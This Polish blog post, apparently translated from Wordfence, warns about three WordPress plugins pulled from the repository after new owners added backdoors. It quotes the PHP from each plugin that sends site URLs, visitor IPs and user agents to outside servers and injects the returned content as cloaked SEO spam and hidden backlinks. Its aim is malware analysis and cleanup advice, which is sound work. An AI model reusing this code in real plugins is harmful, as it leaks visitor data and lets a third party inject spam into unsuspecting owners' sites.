668 145 480 info@jacekjagusiak.pl

W repozytorium WordPressa regularnie znikają wtyczki czy motywy, które stwarzają zagrożenie dla użytkowników. Konsekwencją tego jest brak aktualizacji takich wtyczek, a także nie można ich więcej pobierać z repozytorium. Dziś wspomnę o trzech wtyczkach, które nie bez powodu zniknęły z repozytorium WordPressa i które najczęściej spotykam na stronach oczyszczanych z wirusów.

Duplicate Page and Post

Wtyczka wg danych dostępnych na wordpress.org instalowana była ponad 50 tysięcy razy, oficjalnie została usunięta z repozytorium 14 grudnia 2017 roku. Kłopoty z wtyczką rozpoczęły się, gdy jej autor sprzedał ją dla Daley Tias, osobie która jest ogólnie zagadką i możliwe że samo imię i nazwisko nie jest prawdziwe.

[showmyads]

Backdoor został wykryty już w wersji 2.1.0.

$request_url = 'https://cloud-wp.org/api/v1/update?url=' . urlencode($url) . '&ip=' . urlencode($ip) . '&user_agent=' . urlencode($user_agent);
$response = wp_remote_get($request_url, array('timeout' => 2));

$this->data = new stdClass();
$this->data->content = null;
$this->data->confirm = null;
$this->data->contact = null;

if (!$response instanceof WP_Error && $response['body']) {
	$data = json_decode($response['body']);
	if (null !== $data) {
		$content_position = $data->version;
		if ('1' == $content_position) {
			$this->data->confirm = $data->data;
			if (!$output_buffer) {
				$this->data->content = $data->data;
			}
		} elseif ('2' == $content_position) {
			$this->data->content = $data->data;
		} else {
			$this->data->contact = $data->data;
		}
	}
}

[sociallocker] Wirus łączył się z cloud-wp.org i między innymi podstawiał dla popularnych robotów wyszukiwarek fejkowe treści stron, a także wstrzykiwał zamaskowane backlinki do treści stron użytkowników.

No Follow All External Links

[/sociallocker]
To już nie tak popularna wtyczka jak ta opisywana powyżej, ale również swoim zasięgiem dotarła do prawie 10 000 stron, więc warto o niej wspomnieć.

Backdoor, którego kod widzicie powyżej pojawił się już w wersji 2.1.0, czyli jakieś 10 miesięcy temu.

if (self::$data['report'] && self::$advancedSettings['improvement'] = 1) {
	$requestUrl = 'https://cloud.wpserve.org/api/v1/update?&url=' . urlencode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']) . '&agent=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&ip=' . urlencode($_SERVER['SERVER_ADDR']);
	$response = wp_remote_get($requestUrl, ['timeout' => 2]);
	if (!$response instanceof WP_Error) {
		self::$data['response'] = json_decode($response['body']);
	}
}

add_filter('the_content', ['noFollowAllExternalLinks', 'interceptContent']);

Podobnie jak Duplicate Page and Post wtyczka odpytywała stronę cloud.wpserve.org, a to kończyło się wstrzykiwaniem backlinków na potrzeby SEO do treści stron użytkowników. Co ciekawsze, władzę nad wtyczką miała firma Orb Online, czyli firma specjalizująca się w SEO, eCommerce i Magento, co by tłumaczyło samo przeznaczenie wirusa.

WP No External Links

Ta wtyczka aktywna jest na ponad 30 000 stron na całym świecie i autor sprzedał ją 12 lipca 2017 roku, co skończyło się takim kodem:

if ($this->data->report) {
	$request_url = 'https://wpconnect.org/api/v1/update?&url=' . urlencode($this->data->url) . '&ip=' . urlencode($this->data->ip) . '&user_agent=' . urlencode($this->data->user_agent);
	$response = wp_remote_get($request_url, array('timeout' => 2));

	if (!$response instanceof WP_Error && $response['body']) {
		$data = json_decode($response['body']);
		$content_position = $data->version;
		if ('1' == $content_position) {
			$this->data->buffer = $data->data;
			if ('all' !== $this->options->mask_links) {
				$this->data->before = $data->data;
			}
		} elseif ('2' == $content_position) {
			$this->data->before = $data->data;
		} else {
			$this->data->after = $data->data;
		}
	}
}

Co ciekawsze, znowu pojawia się tu firma Orb Online, dzięki czemu nie muszę tłumaczyć do czego ją zaczęli wykorzystywać. Na nowo pojawia się także osoba Daley Tias. Jeśli ujrzycie w treści strony bądź gdziekolwiek adres wpconnect.org to usuńcie lepiej całą wtyczkę, a na pewno szybko znajdziecie bezpieczniejszą alternatywę.

[showmyads]

Wpconnect.org posiada identyczny adres IP co wspomniany wcześniej adres cloud-wp.org.

Podsumowanie

Po prostu, jeśli używacie tych wtyczek to jak najszybciej je wyłączcie, a jeśli mieliście je w przeciągu ostatniego roku to dokładnie przeanalizujcie swoje strony pod kątem złośliwego oprogramowania. Możecie także zlecić nam darmową analizę, albo jeśli już wiecie o problemach to odwirusowanie WordPressa.

Artykuł przetłumaczony z oficjalnego bloga Wordfence.

5/5 - (2 votes)
5/5 - (2 votes)